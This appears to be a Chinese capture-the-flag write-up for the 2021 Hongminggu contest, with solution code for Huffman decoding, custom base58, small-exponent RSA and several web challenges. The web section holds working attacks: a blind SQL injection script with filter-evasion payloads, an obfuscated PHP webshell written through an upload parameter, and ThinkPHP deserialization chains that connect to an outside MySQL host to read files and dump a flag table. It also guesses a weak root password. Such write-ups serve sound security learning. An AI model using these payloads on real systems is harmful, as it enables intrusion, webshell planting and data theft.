第16名,师傅们tql!
Misc
签到
安全知识问答
歪比歪比
流量包追踪TCP流
发现是哈夫曼树
# -*- coding: utf-8 -*-
# python3
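# Count character frequencies and build the (char, count) mapping table.
def count_freq(text):
    """Return ``[(char, count), ...]`` for every distinct character in *text*.

    Characters are listed in order of first appearance; the Huffman tree
    construction below depends on that order for reproducible codes.

    Args:
        text: the string to analyse; an empty string yields an empty list.

    Returns:
        A list of ``(character, occurrence_count)`` tuples, one per
        distinct character.
    """
    # One pass over an insertion-ordered dict replaces the original
    # list-membership test plus ``str.count`` per character (O(n^2)).
    freqs = {}
    for ch in text:
        freqs[ch] = freqs.get(ch, 0) + 1
    return list(freqs.items())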
# Tree node: a leaf for one symbol, or an internal node for a merged weight.
class Node:
    """Huffman tree node holding a weight and parent/child links.

    ``left``, ``right`` and ``father`` start as ``None`` and are wired up
    by ``createHuffmanTree``.
    """

    def __init__(self, freq):
        # Only the weight is known at construction time; links come later.
        self.freq = freq
        self.father = None
        self.left = None
        self.right = None

    def isLeft(self):
        """Return True when this node is its parent's left child.

        Only meaningful for non-root nodes: the root has no ``father``.
        """
        # Node defines no __eq__, so the original ``==`` was an identity test.
        return self.father.left is self
# Wrap each weight in a leaf node.
def createNodes(freqs):
    """Build one leaf ``Node`` per weight in *freqs*, preserving order."""
    return list(map(Node, freqs))
# Build the Huffman tree by repeatedly merging the two lightest nodes.
def createHuffmanTree(nodes):
    """Link *nodes* into a Huffman tree and return its root.

    Each round the pool is stably sorted by weight and the two lightest
    nodes are merged; equal weights keep their current order, and the new
    parent is appended to the end of the pool.  The input list is left
    untouched, but the nodes themselves are mutated (links are set).

    Args:
        nodes: non-empty list of ``Node`` leaves.

    Returns:
        The root ``Node`` (its ``father`` is ``None``).

    Raises:
        IndexError: when *nodes* is empty.
    """
    pool = list(nodes)
    while len(pool) > 1:
        pool.sort(key=lambda n: n.freq)
        lighter, heavier, *rest = pool
        parent = Node(lighter.freq + heavier.freq)
        parent.left, parent.right = lighter, heavier
        lighter.father = heavier.father = parent
        pool = rest + [parent]
    root = pool[0]
    root.father = None
    return root
# Derive each leaf's code by walking from the leaf up to the root.
def huffmanEncoding(nodes, root):
    """Return the bit-string code for every node in *nodes*.

    Walking from a node to *root*, a left edge contributes ``'0'`` and a
    right edge ``'1'``; bits are collected bottom-up and reversed before
    joining.  ``codes[i]`` corresponds to ``nodes[i]``; *root* itself
    yields ``''``.
    """
    codes = []
    for leaf in nodes:
        bits = []
        current = leaf
        while current is not root:
            bits.append('0' if current.isLeft() else '1')
            current = current.father
        codes.append(''.join(reversed(bits)))
    return codes
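# Encode a whole string with the per-character code table.
def encodeStr(text, chars_freqs, codes):
    """Concatenate the Huffman code of every character of *text*.

    ``chars_freqs[i][0]`` is the character that ``codes[i]`` encodes (the
    layout produced by ``count_freq`` + ``huffmanEncoding``; characters are
    expected to be unique in that table).  Characters with no entry are
    skipped silently, as before; a ``codes`` list shorter than
    ``chars_freqs`` raises ``IndexError``, as before.

    Args:
        text: string to encode (``''`` -> ``''``).
        chars_freqs: ``[(char, count), ...]`` table.
        codes: code string for each entry of *chars_freqs*.

    Returns:
        The encoded bit string.
    """
    # Build the lookup once instead of scanning chars_freqs per character.
    table = {}
    for i, item in enumerate(chars_freqs):
        table[item[0]] = codes[i]
    return ''.join(table.get(ch, '') for ch in text)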
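# Decode a Huffman bit string back into text.
def decodeStr(huffmanStr, chars_freqs, codes):
    """Decode *huffmanStr* using the prefix-free code table.

    At each position the first entry of *codes* that matches is consumed
    and ``chars_freqs[i][0]`` is emitted.  The original looped forever when
    nothing matched (corrupted input, or an empty code from a one-symbol
    tree); that case now raises ``ValueError``.  A position index replaces
    the repeated re-slicing of the remaining string.

    Args:
        huffmanStr: string of ``'0'``/``'1'`` characters (``''`` -> ``''``).
        chars_freqs: ``[(char, count), ...]`` table aligned with *codes*.
        codes: Huffman code for each entry of *chars_freqs*.

    Returns:
        The decoded string.

    Raises:
        ValueError: when the remaining input matches no non-empty code.
    """
    out = []
    pos = 0
    total = len(huffmanStr)
    while pos < total:
        for i, code in enumerate(codes):
            # An empty code would match without advancing -> endless loop.
            if code and huffmanStr.startswith(code, pos):
                out.append(chars_freqs[i][0])
                pos += len(code)
                break
        else:
            raise ValueError('no code matches input at position %d' % pos)
    return ''.join(out)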
if __name__ == '__main__':
    # Symbol weights (presumably recovered from the captured stream; the
    # write-up only says the traffic turned out to be a Huffman tree).
    # Insertion order matters: createHuffmanTree's stable sort breaks
    # equal weights by it, and codes[i] is paired with tt[i][0] below.
    trash_array = {
        'j': 29,
        'z': 31,
        '7': 25,
        'e': 31,
        'l': 23,
        '6': 37,
        '4': 32,
        'p': 38,
        'h': 27,
        'g': 26,
        'x': 28,
        'i': 25,
        'u': 27,
        'n': 25,
        '8': 36,
        '0': 24,
        'o': 23,
        'c': 28,
        'y': 24,
        '1': 29,
        'b': 26,
        'm': 27,
        '2': 28,
        'v': 25,
        'd': 33,
        'f': 28,
        '9': 33,
        't': 21,
        'w': 22,
        'a': 31,
        'r': 24,
        's': 16,
        'k': 32,
        '5': 25,
        'q': 23,
        '3': 32,
        '{': 1,
        '-': 4,
        '}': 1,
    }
    tt = list(trash_array.items())
    chars_freqs = tt
    # Leaves are built from the weights only; the character for codes[i]
    # is looked up through chars_freqs[i][0] by decodeStr.
    nodes = createNodes([item[1] for item in chars_freqs])
    root = createHuffmanTree(nodes)
    codes = huffmanEncoding(nodes, root)
    # Bit string to decode (one literal; it was wrapped across lines on
    # the rendered page).
    huffmanStr = '01111100010000110010100011110111101010100110110111101000001100101111010000100100100011000011100100000111100111011011110110011111010000001110101000001011010010001111000000000101001101001010010111011100100011000111000100101110011000111001100110100110001010101000110111100011111111101110010111000101001011111000010110110010010010000101111101011101110101111000101110110000110010110011010010100101111110011101010001100010010011001011101111011110001100100101111110001111100001010011001001000010011101001010111111011111100111010111010000001001001000111111110010001011101010010011011100010111011010010010010110100001011111110010111111001100101001111111100010011001000100100100111101111101101100011010000100101101100010110100001000110101111101011100001100000100011111111100001010001001011011110001111001011010110011000101010110001100100111110010100111101001000110001011111101110110110000110110101000110111000100010100010100000000011010010100101001111110100101101100111101001010100101010010101000101010110100111100010000110001000010101110011100011001011000010101110111101101111100000010110111110111011010001111111101001111001100111011111001111001011011011010101001100011001001101010111100000111111111000111100111010100111101010101111001111000010001111101111101000100111100110000100001000011001011111010101101011000111000100101000011100010010101100100100101000101011011010011100001011111101010101101101100000100110001110000100010011011011011011001110000110000110101011110101011001010000110110010110001011011101000111100011001111011110110001001101100001110101011011111010011111111111000010001110000010010111110111100101101010111100011100011010100110001011111000011111110111001101010010000111111011111110110011111100011101111101100101110001110110111100101010101100110011101100111100011110100000110101010001111101110111001011001001001000011111010100111011111001100111000000101001010001111001000110010111110000001111111110000000111111111011101111110011101001000001000000110111110100000000111101011101111011010110011110110101011110000101100011010001110001110000011101101110001000111101011001001000111001111001011010100101101010111111100111001000001110110110101011011101110000010011001101110010001110010000001110001100101100001001000100010011110101010001011011110000001101011100111010010111001101111011011111000011110001100011010100001111001000111100011001101110011010111000101010111101111111111001011001010100011011101011011010101010011101000011010110001000011110110111001010110000010010000110110001110111011100110011011101000000101000001011110100000010000110011011011110100111010000001011011010111010011011100000100111100011101001110001011111010101101110100110100110000110001101100101100010010001011011110000100100010111101000101110101001011001011110101000011101111000001001011010111100101100010001111110010000001011100101110100011011011111011101110000101011001000010101010010100100010111010011001010101010011111100000100110100111101010010010011100101101001110111101100001111010000100111110001111110011110100111010110100111000100011111010011100111101011111111111110110101000000101000100100111101001100110111010111010111011000001001111101111001000001010110001101100000101100010011111111110111010110000101011111101110010111011111111001110111010010001110111101101111010010111100110001100110000100110110010011000100101111100001101000011101111001101101001010100101110010011001011110100100010011111110000101111010101100000011101010001110110101111001101010010011100011100010011111100010000100110111101001110111110001011111100110000110100010001010001100111000110010010110001110111001011010001100011100110111010101010010100111011101001001111010111010100110101010101111011101011010000011111001111110100110101111010001010111111010111001011011010011000110011111011111001001111011011011101111110101110101001001011101110000111000010010000111000101011101001111100110011001011111101101001111010000100010000110111100000110101101110101100011100111111100000111100100010110100101111111010101011100100000010100111110111001010001011010101011011010001010001100111011010101100011001010111011101111000000010100000111100110100110000111111101001110111001001110000011010011101111000001010101100000100001000011101110000111111100100101001111111010101100000000001110110100001011001001110011100000010111011000001101101010110010110001110011111100101011110010110111010000100011000111011100101001110000111110011100011001111101101111010101010110010001010110100011000000100011111100110011011111110101100100011110011001111100011100111000100110111001000100110110001100001001011111001111101111010100100011010100111001100010110011110001000110111101000111010111010101111111100000111101101110111100000101111001100111000110101111011111101000000100011111001011000111100011010111111011111110111110111010100011010010001110001011111101010001100110001110111111011111101000011110111100101000111011101111110101011001110001011001000100111010010111100111110011111011100011101111110111001111000101100100110110101000111001010101010101100000010101110011011111001111100101001110000101011110011100110110111110011011100111110010000000001111010110001111100011010100110110000101001001001110111111100100000001010011111111101011000010100000011101001010011110010110110010010010111001011111110'
    orignStr = decodeStr(huffmanStr, chars_freqs, codes)
    print('Decode result:' + orignStr)
InputMonitor
取证题
取证大师一把梭
看输入法自定义词汇
说了是六个字的解压密码,去找六个字的词
解压密码是有志者事竟成
解压flag.7z
编辑pdf,把这个图去掉就有flag了
Reverse
g0
大体逻辑通过 main_Encode 对输入进行加密,正确的话会执行自解密的一段代码,输出flag
动态调试直接找自解密代码,发现是 base58 换了字母表,在 main_main_func1 中找到密文解密得到flag
#coding=utf8
import string
import base58
from Crypto.Cipher import ARC4
STANDARD_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
CUSTOM_ALPHABET = "12Nrst6CDquvG7BefghJKLMEFHPQZabRSTUVmyzno89ApwxWXYcdkij345"
# Character-translation tables in both directions between the standard
# Base58 alphabet and the binary's shuffled one (Python 2 ``string.maketrans``).
ENCODE_TRANS, DECODE_TRANS = (
    string.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET),
    string.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET),
)
def decode(input):
    """Map the custom alphabet back to standard Base58, then b58-decode."""
    # ``input`` shadows the builtin but is the public parameter name.
    standard_form = input.translate(DECODE_TRANS)
    return base58.b58decode(standard_form)
# Ciphertext taken from main_main_func1 (see the write-up text above).
key = "2GVdudkYo2CBXoQii7gfpkjTc4gT"
flag = decode(key)
print(flag)
# flag{We1c0m3_CTF245}
Crypto
RSA ATTACK
import gmpy2,binascii,libnum,time
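n = 28592245028568852124815768977111125874262599260058745599820769758676575163359612268623240652811172009403854869932602124987089815595007954065785558682294503755479266935877152343298248656222514238984548734114192436817346633473367019138600818158715715935132231386478333980631609437639665255977026081124468935510279104246449817606049991764744352123119281766258347177186790624246492739368005511017524914036614317783472537220720739454744527197507751921840839876863945184171493740832516867733853656800209669179467244407710022070593053034488226101034106881990117738617496520445046561073310892360430531295027470929927226907793
e = 3
res = 0
c = 15839981826831548396886036749682663273035548220969819480071392201237477433920362840542848967952612687163860026284987497137578272157113399130705412843449686711908583139117413
print time.asctime()
# Small exponent (e=3) with a short message: m**3 may be smaller than n (or
# only a few multiples of n larger), so an exact integer cube root of
# c + n*i recovers m.  The root is computed once per candidate instead of
# twice as in the original loop; gmpy2.iroot returns (root, is_exact).
for i in xrange(200000000):
    root, exact = gmpy2.iroot(c + n*i, 3)
    if exact:
        res = root
        print i, res
        print libnum.n2s(res)
        print time.asctime()
        break
'''
Fri Apr 2 20:17:15 2021
0 2511413510842166080065277487935235573010338102447558587517
flag{w0_x1hu1n_y0u_b5st}
Fri Apr 2 20:17:15 2021
'''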
Web
happysql
过滤列表如下
用 case 代替 if,lpad 代替 substr,/**/ 代替空格,regexp 代替等号
import requests
import string
import binascii
# Boolean-based blind extraction loop used against the challenge instance.
# Server-side root cause: the username is concatenated into the SQL
# statement and a keyword deny-list is the only defence.  The fix is a
# parameterised query, not a longer deny-list.  From a monitoring point of
# view, a burst of POSTs to login.php whose only variation is a growing
# hex literal is an easy signature.
result = ''
url = "http://eci-2zehajx15wscjh7jgx4v.cloudeci1.ichunqiu.com/login.php"
payload = 'username=admin1"/**/||case/**/when/**/(lpad(((select/**/group_concat(a.1)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/f1ag)/**/as/**/a)),{}))/**/regexp/**/{}/**/then/**/1/**/else/**/0/**/end%23&password=1'
headers = {
    'Content-Type':'application/x-www-form-urlencoded'
}
# k is the prefix length being confirmed; at most 49 characters are read.
for k in range(1,50):
    print(k)
    for i in string.printable:
        # Regex metacharacters are never tried: they would change the
        # meaning of the comparison instead of testing a literal character.
        if i in '*+.?|$':
            continue
        data = payload.format(str(k),'0x' + binascii.b2a_hex((result + i).encode()).decode())
        web = requests.post(url,data,headers=headers)
        #print(data)
        # 'home' in the response body is the oracle: the guess was right.
        if 'home' in web.text:
            result += i
            print(result)
            break
write_shell
利用短标签和或运算绕过过滤。先获取目录,再把 payload 写入 index.php
http://eci-2ze8pd94714j0yxw427u.cloudeci1.ichunqiu.com/?action=upload&data=<?=("%00%00%08%01%02%10%00%00%02%00%00%00%00%01%00%00%00"|"%66%69%64%64%5d%60%75%74%5d%63%6f%6e%74%64%6e%74%73")("%00%02%01%00%00%00%00%00%00%08%00%00%08%00%00%01%00%00%00%00%00%00%00%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00%00%00%00%00%00%01%01%00%00%00%01%00%00%00%10%08%10"|"%2f%74%60%72%2f%77%77%77%2f%60%74%6d%64%2f%73%60%6e%64%62%6f%78%2f%34%64%35%62%30%39%62%32%31%34%39%66%37%36%31%39%63%63%60%31%35%35%63%38%62%64%36%64%38%64%64%35%2f%72%60%79%69%2e%60%60%60","%00%00%00%01%02%01%08%00%00%02%00%00%00%00%00%01%00%00%01%00%00"|"%3c%3f%3d%64%74%60%64%28%24%5d%50%4f%53%54%5b%60%5d%29%3a%3f%3e")?>
访问http://eci-2ze8pd94714j0yxw427u.cloudeci1.ichunqiu.com/sandbox/4e5b09b2149f7619cca155c8bd6d8ee5/
添加蚁剑
easytp
poc
<?php
// NOTE(review): object-injection chain generator for the challenge.  The
// namespace names look as if their separators were lost when the page was
// rendered, so the listing is not runnable as shown.  Defender's reading:
// the entry point is unserialize() of attacker-controlled data, and the
// file read works only because the LOCAL INFILE client option is enabled
// while connecting to an attacker-chosen MySQL host -- keep that option
// off and never unserialize untrusted input.
namespace ThinkDbDriver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true // must be enabled to read files
        );
        // Connection target: presumably the author's own listener, not the
        // challenge host (the write-up text says it was used to read files).
        protected $config = array(
            "debug" => 1,
            "database" => "thinkphp3",
            "hostname" => "47.101.57.72",
            "hostport" => "2333",
            "charset" => "utf8",
            "username" => "root",
            "password" => ""
        );
    }
}
namespace ThinkImageDriver{
    use ThinkSessionDriverMemcache;
    class Imagick{
        private $img;
        public function __construct(){
            $this->img = new Memcache();
        }
    }
}
namespace ThinkSessionDriver{
    use ThinkModel;
    class Memcache{
        protected $handle;
        public function __construct(){
            $this->handle = new Model();
        }
    }
}
namespace Think{
    use ThinkDbDriverMysql;
    class Model{
        protected $options = array();
        protected $pk;
        protected $data = array();
        protected $db = null;
        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            );
        }
    }
}
namespace {
    // Emit the serialized object graph, base64-wrapped for transport.
    echo base64_encode(serialize(new ThinkImageDriverImagick()));
}
按照文章中说的,尝试读配置文件,发现里面没有账号密码
读取/start.sh
发现flag写入了数据库
这里数据库口令为root/root
试了不行,换成123456就成了,弱口令yyds
因为不知道flag在哪个数据库,只能挨个数据库查
<?php
// NOTE(review): same chain as the first listing, now pointed at the local
// database with the weak password found by guessing (see the write-up
// text).  Two defensive observations: the root account accepted a trivial
// password, and the application's DB user is root at all -- a dedicated
// low-privilege account would have bounded what this chain could reach.
// Namespace separators appear to have been lost in rendering.
namespace ThinkDbDriver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true // must be enabled to read files
        );
        protected $config = array(
            "debug" => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset" => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}
namespace ThinkImageDriver{
    use ThinkSessionDriverMemcache;
    class Imagick{
        private $img;
        public function __construct(){
            $this->img = new Memcache();
        }
    }
}
namespace ThinkSessionDriver{
    use ThinkModel;
    class Memcache{
        protected $handle;
        public function __construct(){
            $this->handle = new Model();
        }
    }
}
namespace Think{
    use ThinkDbDriverMysql;
    class Model{
        protected $options = array();
        protected $pk;
        protected $data = array();
        protected $db = null;
        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            // The table name is interpolated unescaped into the query, which
            // is what makes the updatexml() error-based read possible.
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            );
        }
    }
}
namespace {
    echo base64_encode(serialize(new ThinkImageDriverImagick()));
}
最后查到数据库名为 tp,表名为 f14g。利用子查询进行无列名查询
<?php
// NOTE(review): final variant of the chain; only the "table" value differs
// from the previous listing.  The error-based read is limited by the length
// of the updatexml() error text, hence the substr() window the write-up
// mentions.  Mitigation is unchanged: do not unserialize untrusted data,
// and never let a table name reach the query without validation.
// Namespace separators appear to have been lost in rendering.
namespace ThinkDbDriver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true // must be enabled to read files
        );
        protected $config = array(
            "debug" => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset" => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}
namespace ThinkImageDriver{
    use ThinkSessionDriverMemcache;
    class Imagick{
        private $img;
        public function __construct(){
            $this->img = new Memcache();
        }
    }
}
namespace ThinkSessionDriver{
    use ThinkModel;
    class Memcache{
        protected $handle;
        public function __construct(){
            $this->handle = new Model();
        }
    }
}
namespace Think{
    use ThinkDbDriverMysql;
    class Model{
        protected $options = array();
        protected $pk;
        protected $data = array();
        protected $db = null;
        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,concat(0x7e,substr((select group_concat(a.1) from (select 1 union select * from tp.f14g) as a),1,30)),1)#",
                "where" => "1=1"
            );
        }
    }
}
namespace {
    echo base64_encode(serialize(new ThinkImageDriverImagick()));
}
用 substr 绕过长度限制,爆出 flag
本文始发于微信公众号(山警网络空间安全与电子数据取证):2021 “红明谷”杯数据安全大赛 writeup
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。